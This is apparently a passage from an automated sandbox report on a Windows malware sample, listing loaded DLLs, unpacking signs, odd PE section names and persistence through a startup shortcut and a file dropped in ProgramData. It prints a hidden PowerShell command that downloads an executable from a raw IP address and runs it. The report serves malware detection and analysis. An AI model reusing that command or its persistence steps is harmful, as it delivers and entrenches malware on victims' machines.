                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: wtsapi32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: msi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: dbghelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: dbgcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\ProgramData\windows\windows.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\ProgramData\windows\windows.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\ProgramData\windows\windows.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\ProgramData\windows\windows.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\ProgramData\windows\windows.exeSection loaded: wtsapi32.dllJump to behavior
                            Source: C:\ProgramData\windows\windows.exeSection loaded: msi.dllJump to behavior
                            Source: C:\ProgramData\windows\windows.exeSection loaded: dbghelp.dllJump to behavior
                            Source: C:\ProgramData\windows\windows.exeSection loaded: dbgcore.dllJump to behavior
                            Source: C:\ProgramData\windows\windows.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\ProgramData\windows\windows.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\ProgramData\windows\windows.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\ProgramData\windows\windows.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\ProgramData\windows\windows.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\ProgramData\windows\windows.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: msi.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: dbghelp.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: dbgcore.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: linkinfo.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: ntshrui.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: cscapi.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: napinsp.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: pnrpnsp.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: wshbth.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: nlaapi.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: winrnr.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                            Source: C:\ProgramData\windows\windows.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\ProgramData\windows\windows.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\ProgramData\windows\windows.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\ProgramData\windows\windows.exeSection loaded: wtsapi32.dllJump to behavior
                            Source: C:\ProgramData\windows\windows.exeSection loaded: msi.dllJump to behavior
                            Source: C:\ProgramData\windows\windows.exeSection loaded: dbghelp.dllJump to behavior
                            Source: C:\ProgramData\windows\windows.exeSection loaded: dbgcore.dllJump to behavior
                            Source: C:\ProgramData\windows\windows.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\ProgramData\windows\windows.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00021401-0000-0000-C000-000000000046}\InProcServer32Jump to behavior
                            Source: 009274965.lnkLNK file: ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Source: {5CAAC06D-2278-4820-8E02-FD7BF03ADE5D}.lnk.12.drLNK file: ..\..\..\..\..\..\..\..\..\ProgramData\{43FE0128-8195-4F1C-ADAF-97085D2B6441}\{323467A8-45DA-47D5-AF53-60BD8A3D7BCB}.bat
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                            Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: file.exe, 00000003.00000002.1638588630.00007FF7FE611000.00000040.00000001.01000000.00000007.sdmp, windows.exe, 00000007.00000002.2778931086.00007FF7EDED1000.00000040.00000001.01000000.00000008.sdmp, explorer.exe, 0000000C.00000002.2777832151.0000000002A3A000.00000040.00001000.00020000.00000000.sdmp, windows.exe, 00000012.00000002.1830258271.00007FF7EDED1000.00000040.00000001.01000000.00000008.sdmp
                            Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: file.exe, file.exe, 00000003.00000002.1638588630.00007FF7FE611000.00000040.00000001.01000000.00000007.sdmp, windows.exe, windows.exe, 00000007.00000002.2778931086.00007FF7EDED1000.00000040.00000001.01000000.00000008.sdmp, explorer.exe, explorer.exe, 0000000C.00000002.2777832151.0000000002A3A000.00000040.00001000.00020000.00000000.sdmp, windows.exe, 00000012.00000002.1830258271.00007FF7EDED1000.00000040.00000001.01000000.00000008.sdmp

                            Data Obfuscation

                            barindex
                            Detected unpacking (changes PE section rights)
                            Source: C:\Users\user\AppData\Local\Temp\file.exeUnpacked PE file: 3.2.file.exe.7ff7fe2c0000.0.unpack :EW;.rsrc:W;.idata :W;ikkqoqkj:EW;bywcbldd:EW;.pdata:R; vs :ER;.rsrc:W;.idata :W;ikkqoqkj:EW;bywcbldd:EW;.pdata:R;
                            Source: C:\ProgramData\windows\windows.exeUnpacked PE file: 7.2.windows.exe.7ff7edb80000.0.unpack :EW;.rsrc:W;.idata :W;ikkqoqkj:EW;bywcbldd:EW;.pdata:R; vs :ER;.rsrc:W;.idata :W;ikkqoqkj:EW;bywcbldd:EW;.pdata:R;
                            Source: C:\ProgramData\windows\windows.exeUnpacked PE file: 18.2.windows.exe.7ff7edb80000.0.unpack :EW;.rsrc:W;.idata :W;ikkqoqkj:EW;bywcbldd:EW;.pdata:R; vs :ER;.rsrc:W;.idata :W;ikkqoqkj:EW;bywcbldd:EW;.pdata:R;
                            Suspicious powershell command line found
                            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/image.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }"
                            Source: initial sampleStatic PE information: section where entry point is pointing to: bywcbldd
                            Source: file.exe.0.drStatic PE information: section name:
                            Source: file.exe.0.drStatic PE information: section name: .idata
                            Source: file.exe.0.drStatic PE information: section name: ikkqoqkj
                            Source: file.exe.0.drStatic PE information: section name: bywcbldd
                            Source: file.exe.0.drStatic PE information: section name: .pdataI
                            Source: windows.exe.3.drStatic PE information: section name:
                            Source: windows.exe.3.drStatic PE information: section name: .idata
                            Source: windows.exe.3.drStatic PE information: section name: ikkqoqkj
                            Source: windows.exe.3.drStatic PE information: section name: bywcbldd
                            Source: windows.exe.3.drStatic PE information: section name: .pdataI
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFB4B0A00BD pushad ; iretd 0_2_00007FFB4B0A00C1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFB4B0A00ED push A8BA495Dh; iretd 0_2_00007FFB4B0A011B
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFB4B0A4583 push eax; iretd 0_2_00007FFB4B0A459D
                            Source: C:\Windows\explorer.exeCode function: 12_2_02A31E90 push r14; retf 12_2_02A31E93
                            Source: C:\Windows\explorer.exeCode function: 12_2_02A31E38 push rsi; retf 12_2_02A31E13
                            Source: C:\Windows\explorer.exeCode function: 12_2_02A31E38 push rsi; retf 12_2_02A31E53
                            Source: C:\Windows\explorer.exeCode function: 12_2_029F9020 push rbp; retf 12_2_029F908B
                            Source: C:\Windows\explorer.exeCode function: 12_2_029F9258 push rbp; retf 12_2_029F925B
                            Source: C:\Windows\explorer.exeCode function: 12_2_02A31E68 push rbp; retf 12_2_02A31E6B
                            Source: C:\Windows\explorer.exeCode function: 12_2_02A31E78 push rsi; retf 12_2_02A31E7B
                            Source: C:\Windows\explorer.exeCode function: 12_2_02A31E48 push rsi; retf 12_2_02A31E53
                            Source: C:\Windows\explorer.exeCode function: 12_2_029F9270 push rbp; retf 12_2_029F9273
                            Source: C:\Windows\explorer.exeCode function: 12_2_029F9270 push r14; retf 12_2_029F92DB
                            Source: C:\Windows\explorer.exeCode function: 12_2_029EFE6C push rsi; retf 12_2_029F919B
                            Source: C:\Windows\explorer.exeCode function: 12_2_029F9260 push rbp; retf 12_2_029F9263
                            Source: C:\Windows\explorer.exeCode function: 12_2_02A31DA0 push rbp; retf 12_2_02A31DC3
                            Source: C:\Windows\explorer.exeCode function: 12_2_029F9190 push rsi; retf 12_2_029F919B
                            Source: C:\Windows\explorer.exeCode function: 12_2_029F9188 push rsi; retf 12_2_029F915B
                            Source: C:\Windows\explorer.exeCode function: 12_2_02A31D90 push rsi; retf 12_2_02A31D93
                            Source: C:\Windows\explorer.exeCode function: 12_2_02A31D90 push rsi; retf 12_2_02A31DEB
                            Source: C:\Windows\explorer.exeCode function: 12_2_02A31D98 push rsi; retf 12_2_02A31D9B
                            Source: C:\Windows\explorer.exeCode function: 12_2_02A31D98 push rbp; retf 12_2_02A31DE3

                            Persistence and Installation Behavior

                            barindex
                            Windows shortcut file (LNK) starts blacklisted processes
                            Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
                            Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
                            Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
                            Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
                            Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
                            Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
                            Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
                            Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
                            Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\file.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\file.exeFile created: C:\ProgramData\windows\windows.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\file.exeFile created: C:\ProgramData\windows\windows.exeJump to dropped file
                            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\{5CAAC06D-2278-4820-8E02-FD7BF03ADE5D}.lnkJump to behavior
                            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\{5CAAC06D-2278-4820-8E02-FD7BF03ADE5D}.lnkJump to behavior

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Loading BitLocker PowerShell Module
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\file.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\{5D4C2B42-A3F9-4C6F-B6E3-FA9F3AB76D53} {178DF53C-5EDA-4F9B-979B-9C5AF76ECA39}Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
